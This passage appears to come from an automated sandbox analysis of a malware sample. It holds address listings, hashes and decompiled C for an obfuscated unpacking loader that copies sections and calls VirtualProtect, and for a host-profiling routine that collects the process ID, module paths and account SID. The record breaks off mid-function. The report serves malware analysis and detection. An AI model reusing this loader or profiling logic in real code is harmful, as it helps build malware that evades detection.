0x02114031
0x02114039
0x0211403a
0x0211403d
0x02114045
0x02114049
0x02114050
0x0211405c
0x02114063
0x02114069
0x0211406c
0x0211406f
0x02114078
0x0211407b
0x0211407b
0x0211407e
0x0211408a
0x0211408c
0x02114094
0x02114098
0x0211409f
0x021140a5
0x021140ad
0x021140b4
0x021140c3
0x021140c6
0x021140cb
0x021140ce
0x021140ce
0x021140d1
0x021140d1
0x021140d1
0x021140d3
0x021140d6
0x021140d9
0x021140dc
0x021140e4
0x021140e7
0x021140ee
0x021140f4
0x021140fc
0x02114103
0x02114109
0x0211410e
0x02114111
0x02114111
0x02114119
0x0211411c
0x0211411d
0x02114120
0x02114121
0x02114121
0x02114136
0x0211413e
0x02114144
0x02114144
0x02114144
0x02114144
0x0211415f

APIs

OleInitialize.OLE32(?,?,?,00000000,00000000), ref: 02113811

Memory Dump Source

Source File: 00000009.00000002.552434410.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: true

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
Instruction ID: ce9d3cb151e50afa597c2ad4bee49ffbd88d07a5dbb5a9993343c4907cd3c9b3
Opcode Fuzzy Hash: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
Instruction Fuzzy Hash: 91624C72904A04EFFF049FA0C889B9A7BB5FF24321F0851A9ED5D9E099D77411A4CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0211242A, Relevance: 2.1, APIs: 1, Instructions: 592
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E0211242A(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36, char _a244) {
				signed int _v8;
				signed int _v12;
				signed int _t337;
				signed int _t339;
				void* _t346;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t357;
				signed int _t358;
				signed int _t361;
				void* _t364;
				void* _t365;
				signed int _t366;
				signed int _t368;
				signed int _t371;
				signed int _t374;
				signed int _t377;
				signed int _t379;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				signed int _t388;
				signed int _t391;
				signed int _t392;
				signed int _t394;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t404;
				signed int _t405;
				signed int _t408;
				signed int _t409;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t420;
				signed int _t423;
				signed int _t428;
				signed int _t431;
				signed int _t433;
				signed int _t454;
				signed int _t457;
				signed int _t479;
				signed int _t481;
				signed int _t484;
				void* _t486;
				signed int _t489;
				void* _t492;
				signed int _t500;
				signed int _t503;
				void* _t516;
				signed int _t523;
				signed int _t526;
				signed int _t529;
				void* _t531;
				signed int _t562;
				void* _t565;
				void* _t568;
				signed int* _t571;
				signed int* _t572;
				signed int* _t574;
				signed int* _t575;

				_t523 = __esi;
				_t479 = __edi;
				_t450 = __edx;
				_t426 = __ecx;
				_t417 = __ebx;
				if( *(__ebx + 0x4351c7) == 0) {
					_push(__ecx);
					_push(__edx);
					_push(__ebx + 0x4351ef);
					_t337 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_v12 = __edx;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) & 0x00000000;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) | __edx ^ _v12 | _t337;
					_pop( *_t11);
					_t450 = _v12 & 0x00000000 ^ _v12;
					_pop( *_t13);
					_t426 = __ecx & 0x00000000 | _v12;
				}
				if( *(_t417 + 0x4352b0) == 0) {
					_push(_t426);
					_push(_t450);
					if( *(_t417 + 0x4355c5) == 0) {
						_t415 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x435914)));
						_v12 = _t523;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) & 0x00000000;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) | _t523 - _v12 | _t415;
						_t523 = _v12;
					}
					_t337 =  *((intOrPtr*)(_t417 + 0x441064))(_t417 + 0x4359f9);
					if( *(_t417 + 0x43523f) == 0) {
						_t413 =  *((intOrPtr*)(_t417 + 0x441060))(_t337);
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) & 0x00000000;
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) | _t479 -  *_t571 | _t413;
						_t479 = _t479;
						_t337 =  *_t571;
						_t571 =  &(_t571[1]);
					}
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) & 0x00000000;
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) | _t523 ^  *_t571 | _t337;
					_t523 = _t523;
					if( *(_t417 + 0x4351b3) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x435978)),  *((intOrPtr*)(_t417 + 0x4356a9)));
						_push(_t426);
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) & 0x00000000;
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) ^ (_t426 & 0x00000000 | _t337);
					}
					_pop( *_t46);
					_t450 = _v12;
					_t426 =  *_t571;
					_t571 =  &(_t571[1]);
					if( *(_t417 + 0x4353c2) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4352a8, _t450, _t426);
						_v12 = _t479;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) & 0x00000000;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) | _t479 - _v12 | _t337;
						_t479 = _v12;
						_t450 =  *_t571;
						_t575 =  &(_t571[1]);
						_t426 =  *_t575;
						_t571 = _t575 - 0xfffffffc;
					}
				}
				_push(_t450);
				_push(_t426);
				_t339 = _t337 & 0x00000000 ^ (_t523 ^  *_t571 | _a4);
				_t526 = _t523;
				if( *(_t417 + 0x43524c) == 0) {
					_t409 =  *((intOrPtr*)(_t417 + 0x44105c))();
					_v12 = _t450;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) & 0x00000000;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) ^ (_t450 & 0x00000000 | _t409);
					_t450 = _v12;
					 *_t67 = _t339;
					_t339 = 0 + _v12;
				}
				if( *(_t417 + 0x43539a) == 0) {
					_t404 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435020, _t417 + 0x435a31, _t339);
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) & 0x00000000;
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) ^ (_t479 & 0x00000000 | _t404);
					_t516 = _t479;
					_t405 =  *((intOrPtr*)(_t417 + 0x441060))();
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) & 0x00000000;
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) | _t516 -  *_t571 ^ _t405;
					_t479 = _t516;
					if( *(_t417 + 0x4355b1) == 0) {
						_t408 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x435068);
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) & 0x00000000;
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) ^ (_t426 ^  *_t571 | _t408);
						_t426 = _t426;
					}
					_t339 =  *_t571;
					_t571 = _t571 - 0xfffffffc;
				}
				 *_t93 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435669, _t417 + 0x4350e8, _t339 +  *((intOrPtr*)(_t339 + 0x3c)));
				_push(_v12);
				_pop( *_t95);
				_t572 = _t571 - 0xfffffffc;
				_push(0 ^  *_t571);
				_t346 = _t417 + 0x43517b;
				if( *(_t417 + 0x43525c) == 0) {
					_t400 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x4352d7)),  *((intOrPtr*)(_t417 + 0x43563d)), _t346);
					_v12 = _t450;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) & 0x00000000;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) ^ (_t450 - _v12 | _t400);
					_t450 = _v12;
					_t346 = (_t400 & 0x00000000) +  *_t572;
					_t572 = _t572 - 0xfffffffc;
				}
				_push(_t346);
				_t347 = _t417 + 0x435162;
				if( *(_t417 + 0x4357ee) == 0) {
					_t398 =  *((intOrPtr*)(_t417 + 0x441060))();
					_v12 = _t479;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) & 0x00000000;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) ^ _t479 - _v12 ^ _t398;
					_t479 = _v12;
					 *_t118 = _t347;
					_t347 = 0 + _v12;
				}
				_t348 =  *((intOrPtr*)(_t417 + 0x441044))();
				_v12 = _t526;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) & 0x00000000;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) | _t526 - _v12 ^ _t348;
				_t529 = _v12;
				 *_t128 = _t347;
				_t350 = 0 + _v12;
				if( *(_t417 + 0x4357de) == 0) {
					_t397 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4350d4, _t350);
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) & 0x00000000;
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) | _t450 -  *_t572 ^ _t397;
					_t450 = _t450;
					_pop( *_t137);
					_t350 = _v12;
				}
				_push(_t350);
				_v12 = _t450;
				_t481 = _t479 & 0x00000000 ^ (_t450 ^ _v12 | _t350);
				_t351 =  *(_t481 + 6) & 0x0000ffff;
				if( *(_t417 + 0x435579) == 0) {
					_t394 =  *((intOrPtr*)(_t417 + 0x4410a4))( *((intOrPtr*)(_t417 + 0x4352a4)), _t351);
					 *_t572 = _t529;
					 *(_t417 + 0x435579) = 0 ^ _t394;
					_t529 = 0;
					_t351 = 0 ^  *_t572;
					_t572 =  &(_t572[1]);
				}
				if( *((intOrPtr*)(_t417 + 0x435575)) == 0) {
					if( *(_t417 + 0x43534a) == 0) {
						_t392 =  *((intOrPtr*)(_t417 + 0x441060))(_t351);
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) & 0x00000000;
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) | _t529 -  *_t572 | _t392;
						_t529 = _t529;
						_t351 =  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_push(_t351);
					_push(_t417 + 0x43573a);
					if( *(_t417 + 0x43580e) == 0) {
						_t391 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x43505c);
						_v12 = _t529;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) & 0x00000000;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) | _t529 & 0x00000000 | _t391;
						_t529 = _v12;
					}
					_t384 =  *((intOrPtr*)(_t417 + 0x441054))();
					if( *(_t417 + 0x435555) == 0) {
						_t388 =  *((intOrPtr*)(_t417 + 0x441060))(_t384);
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) & 0x00000000;
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) ^ _t426 ^  *_t572 ^ _t388;
						_t426 = _t426;
						_t384 = _t388 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					 *_t171 = _t384;
					_push(_v12);
					_pop( *_t173);
					if( *((intOrPtr*)(_t417 + 0x435716)) == 0) {
						 *_t177 =  *((intOrPtr*)(_t417 + 0x44106c))(_t417 + 0x4358e4);
						_push(_v12);
						_pop( *_t179);
					}
					_pop( *_t180);
					_t351 = 0 + _v12;
				}
				_v12 = _t481;
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t481 ^ _v12 | _t351);
				_t484 = _v12;
				if( *(_t417 + 0x43577a) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x4351e3)));
					 *_t572 = _t484;
					 *(_t417 + 0x43577a) = _t351;
					_t484 = 0;
				}
				_push(_t484);
				if( *(_t417 + 0x435008) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x441058))();
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) & 0x00000000;
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) | _t529 & 0x00000000 ^ _t351;
					_t529 = _t529;
				}
				 *_t572 = _t417;
				_t454 = 0 ^  *(_t484 + 0x54);
				_t420 = 0;
				_v12 = _t351;
				_t486 = _t484 & 0x00000000 ^ (_t351 - _v12 |  *(_t420 + 0x4350b0));
				if( *(_t420 + 0x435156) == 0) {
					_t205 = _t420 + 0x435900; // 0x435900
					_t382 =  *((intOrPtr*)(_t420 + 0x44106c))(_t205, _t454);
					_v12 = _t486;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) & 0x00000000;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) | _t486 ^ _v12 | _t382;
					_t486 = _v12;
					_t454 =  *_t572;
					_t572 =  &(_t572[1]);
				}
				_t531 = _t529 & 0x00000000 | _t420 & 0x00000000 ^ _a4;
				_t423 = _t420;
				_t428 = _t426 & 0x00000000 ^ (_t562 & 0x00000000 | _t454);
				_t565 = _t562;
				if(_t486 == _t531) {
					L50:
					_pop( *_t258);
					if( *(_t423 + 0x4354c6) == 0) {
						_t371 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) & 0x00000000;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) ^ _t531 ^ _v12 ^ _t371;
						_t531 = _v12;
					}
					_t489 =  &_a244;
					_t568 = _t565;
					do {
						_t431 = _t428;
						_v12 = _t423;
						_t433 = _t431 & 0x00000000 | _t423 & 0x00000000 ^  *(_t489 + 0x10);
						_t423 = _v12;
						_t273 = _t423 + 0x4350ed; // 0x4350ed
						_t274 = _t423 + 0x43585d; // 0x43585d
						_t357 =  *((intOrPtr*)(_t423 + 0x441044))(_t274, _t273, _t433, _t489);
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) & 0x00000000;
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) | _t489 & 0x00000000 ^ _t357;
						_t492 = _t489;
						_t531 = (_t531 & 0x00000000 | _t428 & 0x00000000 | _a4) +  *((intOrPtr*)(_t492 + 0x14));
						_t358 = memcpy( *((intOrPtr*)(_t492 + 0xc)) +  *(_t423 + 0x4350b0), _t531, _t433 & 0x00000000 |  *_t572);
						_t572 =  &((_t572 - 0xfffffffc)[3]);
						_t428 = 0;
						if( *(_t423 + 0x435944) == 0) {
							_t284 = _t423 + 0x435a21; // 0x435a21
							_t358 =  *((intOrPtr*)(_t423 + 0x441054))(_t284);
							_v12 = _t531;
							 *(_t423 + 0x435944) = 0 ^ _t358;
							_t531 = _v12;
						}
						_pop( *_t289);
						_t489 =  &_a36;
						_t568 = _t568;
						if( *(_t423 + 0x4356c1) == 0) {
							_t358 =  *((intOrPtr*)(_t423 + 0x4410a4))(1);
							_v12 = _t531;
							 *(_t423 + 0x4356c1) = _t358;
							_t531 = _v12;
						}
						_t296 =  &_v8;
						 *_t296 = _v8 - 1;
					} while ( *_t296 != 0);
					if( *(_t423 + 0x435018) == 0) {
						_t358 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x43549a)), 9);
						_push(0);
						 *_t572 = _t489;
						 *(_t423 + 0x435018) = 0 ^ _t358;
					}
					_t500 =  *_t572;
					_t574 = _t572 - 0xfffffffc;
					_v12 = _t454;
					_t457 = _v12;
					_t361 = (_t358 & 0x00000000 ^ _t454 ^ _v12 ^  *(_t500 + 0x28)) +  *(_t423 + 0x4350b0);
					if( *(_t423 + 0x435376) == 0) {
						_t308 = _t423 + 0x435524; // 0x435524
						_t368 =  *((intOrPtr*)(_t423 + 0x44106c))(_t361);
						_v12 = _t531;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) & 0x00000000;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) | _t531 ^ _v12 | _t368;
						_t531 = _v12;
						 *_t317 = _t308;
						_t361 = _t368 & 0x00000000 ^ _v12;
					}
					_v12 = _t500;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) & 0x00000000;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) | _t500 ^ _v12 ^ _t361;
					_t503 = _v12;
					_t535 = _t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0));
					_t364 = _t361;
					if((_t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0))) > 0) {
						if( *(_t423 + 0x43536e) == 0) {
							_t366 =  *((intOrPtr*)(_t423 + 0x441070))(0);
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) & 0x00000000;
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) | _t457 ^  *_t574 | _t366;
							_t457 = _t457;
						}
						_t365 = E02112C41(_t423, _t428, _t457, _t503, _t535, _t535); // executed
						_t364 = E021134DA(_t365, _t423, _t428, _t457, _t503, _t535, _t535);
					}
					_pop( *_t333);
					_pop( *_t335);
					return _t364;
				} else {
					if( *(_t423 + 0x435004) == 0) {
						_t380 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x4352fb)),  *((intOrPtr*)(_t423 + 0x4354e6)), _t454, _t428);
						_v12 = _t454;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) & 0x00000000;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) ^ _t454 & 0x00000000 ^ _t380;
						_pop( *_t225);
						_t454 = _v12;
						_pop( *_t227);
						_t428 = _v12 + (_t428 & 0x00000000);
					}
					do {
						asm("movsb");
						_t428 = _t428 - 1;
					} while (_t428 != 0);
					if( *(_t423 + 0x4359f5) == 0) {
						_t230 = _t423 + 0x4356a1; // 0x4356a1
						_t379 =  *((intOrPtr*)(_t423 + 0x441068))(_t230, _t454);
						_v12 = _t531;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) & 0x00000000;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) ^ _t531 - _v12 ^ _t379;
						_t531 = _v12;
						_t454 = _t454 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_t486 = _t486 & 0x00000000 ^ (_t428 -  *_t572 |  *(_t423 + 0x4350b0));
					_t428 = _t428;
					 *((intOrPtr*)(_t423 + 0x4354d2)) = 0x40;
					_t241 = _t423 + 0x4356e5; // 0x4356e5
					_t242 = _t423 + 0x4352b4; // 0x4352b4
					_t374 =  *((intOrPtr*)(_t423 + 0x441044))(_t242, _t241, _t454);
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) & 0x00000000;
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) | _t531 ^  *_t572 ^ _t374;
					_t531 = _t531;
					_t454 =  *_t572;
					_t572 = _t572 - 0xfffffffc;
					_t248 = _t423 + 0x4354d2; // 0x4354d2
					_push(2);
					_push(_t454);
					if( *(_t423 + 0x435010) == 0) {
						_t377 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) & 0x00000000;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) ^ _t531 & 0x00000000 ^ _t377;
						_t531 = _v12;
					}
					VirtualProtect(_t486, ??, ??, ??);
					goto L50;
				}
			}

0x0211242a
0x0211242a
0x0211242a
0x0211242a
0x0211242a
0x02112437
0x02112439
0x0211243a
0x02112441
0x02112442
0x02112448
0x02112450
0x02112457
0x02112466
0x02112469
0x02112472
0x02112475
0x02112475
0x0211247f
0x02112485
0x02112486
0x0211248e
0x02112498
0x0211249e
0x021124a6
0x021124ad
0x021124b3
0x021124b3
0x021124bd
0x021124ca
0x021124cd
0x021124d9
0x021124e0
0x021124e6
0x021124e9
0x021124ec
0x021124ec
0x021124f5
0x021124fc
0x02112502
0x0211250a
0x02112518
0x0211251e
0x02112524
0x0211252b
0x02112531
0x02112532
0x02112535
0x0211253a
0x0211253d
0x02112547
0x02112552
0x02112558
0x02112560
0x02112567
0x0211256d
0x02112572
0x02112575
0x0211257a
0x0211257d
0x0211257d
0x02112547
0x02112580
0x02112581
0x0211258c
0x0211258e
0x02112596
0x02112599
0x0211259f
0x021125a7
0x021125ae
0x021125b4
0x021125b9
0x021125bc
0x021125bc
0x021125c6
0x021125d7
0x021125e3
0x021125ea
0x021125f0
0x021125f1
0x021125fd
0x02112604
0x0211260a
0x02112612
0x0211261b
0x02112627
0x0211262e
0x02112634
0x02112634
0x02112637
0x0211263a
0x0211263a
0x02112656
0x02112659
0x0211265c
0x02112667
0x0211266a
0x0211266b
0x02112678
0x02112687
0x0211268d
0x02112695
0x0211269c
0x021126a2
0x021126ab
0x021126ae
0x021126ae
0x021126b1
0x021126b2
0x021126bf
0x021126c2
0x021126c8
0x021126d0
0x021126d7
0x021126dd
0x021126e2
0x021126e5
0x021126e5
0x021126e9
0x021126ef
0x021126f7
0x021126fe
0x02112704
0x02112709
0x0211270c
0x02112716
0x02112720
0x0211272c
0x02112733
0x02112739
0x0211273a
0x0211273d
0x0211273d
0x02112740
0x02112741
0x0211274c
0x02112751
0x0211275c
0x02112765
0x0211276d
0x02112774
0x0211277a
0x0211277d
0x02112780
0x02112780
0x0211278a
0x02112797
0x0211279a
0x021127a6
0x021127ad
0x021127b3
0x021127ba
0x021127bd
0x021127bd
0x021127c0
0x021127c7
0x021127cf
0x021127d8
0x021127de
0x021127e6
0x021127ed
0x021127f3
0x021127f3
0x021127f6
0x02112803
0x02112806
0x02112812
0x02112819
0x0211281f
0x02112826
0x02112829
0x02112829
0x0211282d
0x02112830
0x02112833
0x02112840
0x02112850
0x02112853
0x02112856
0x02112856
0x0211285e
0x02112861
0x02112861
0x02112864
0x0211286c
0x02112870
0x02112873
0x0211287d
0x02112887
0x0211288f
0x02112896
0x0211289c
0x0211289c
0x0211289d
0x021128a5
0x021128a7
0x021128b3
0x021128ba
0x021128c0
0x021128c0
0x021128c3
0x021128cb
0x021128cd
0x021128ce
0x021128dd
0x021128e9
0x021128ec
0x021128f3
0x021128f9
0x02112901
0x02112908
0x0211290e
0x02112913
0x02112916
0x02112916
0x02112923
0x02112925
0x0211292f
0x02112931
0x02112934
0x02112a43
0x02112a49
0x02112a56
0x02112a58
0x02112a5e
0x02112a66
0x02112a6d
0x02112a73
0x02112a73
0x02112a7f
0x02112a81
0x02112a82
0x02112a8f
0x02112a90
0x02112a9c
0x02112a9e
0x02112aa2
0x02112aa9
0x02112ab0
0x02112abc
0x02112ac3
0x02112ac9
0x02112ad6
0x02112ae2
0x02112ae2
0x02112ae2
0x02112aeb
0x02112aed
0x02112af4
0x02112afa
0x02112b01
0x02112b07
0x02112b07
0x02112b10
0x02112b1f
0x02112b21
0x02112b29
0x02112b2d
0x02112b33
0x02112b3a
0x02112b40
0x02112b40
0x02112b43
0x02112b43
0x02112b43
0x02112b53
0x02112b5d
0x02112b63
0x02112b65
0x02112b6c
0x02112b72
0x02112b75
0x02112b78
0x02112b7b
0x02112b89
0x02112b8c
0x02112b99
0x02112b9c
0x02112ba3
0x02112ba9
0x02112bb1
0x02112bb8
0x02112bbe
0x02112bc7
0x02112bca
0x02112bca
0x02112bcd
0x02112bd5
0x02112bdc
0x02112be2
0x02112bf2
0x02112bf4
0x02112bf8
0x02112c01
0x02112c05
0x02112c11
0x02112c18
0x02112c1e
0x02112c1e
0x02112c20
0x02112c26
0x02112c26
0x02112c2b
0x02112c37
0x02112c3e
0x0211293a
0x02112941
0x02112951
0x02112957
0x0211295f
0x02112966
0x0211296f
0x02112972
0x0211297b
0x0211297e
0x0211297e
0x02112981
0x02112981
0x02112982
0x02112982
0x0211298c
0x0211298f
0x02112996
0x0211299c
0x021129a4
0x021129ab
0x021129b1
0x021129ba
0x021129bd
0x021129bd
0x021129cd
0x021129cf
0x021129d0
0x021129db
0x021129e2
0x021129e9
0x021129f5
0x021129fc
0x02112a02
0x02112a05
0x02112a08
0x02112a0b
0x02112a12
0x02112a14
0x02112a1c
0x02112a1e
0x02112a24
0x02112a2c
0x02112a33
0x02112a39
0x02112a39
0x02112a3d
0x00000000
0x02112a3d

APIs

VirtualProtect.KERNEL32(00000000,00000000,00000002,004354D2), ref: 02112A3D

Memory Dump Source

Source File: 00000009.00000002.552434410.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
Instruction ID: 3ca89ad3d73f7619d9d3e94cd32f2c2d1b7f7b6e6b50746bc7361454ffec6b14
Opcode Fuzzy Hash: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
Instruction Fuzzy Hash: 10425D72810614EFFF00DFA4C98979A7BB5FF54325F1851AADC0DAE049C77852A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 1000D01F, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x2ecfaa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x2ecfbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
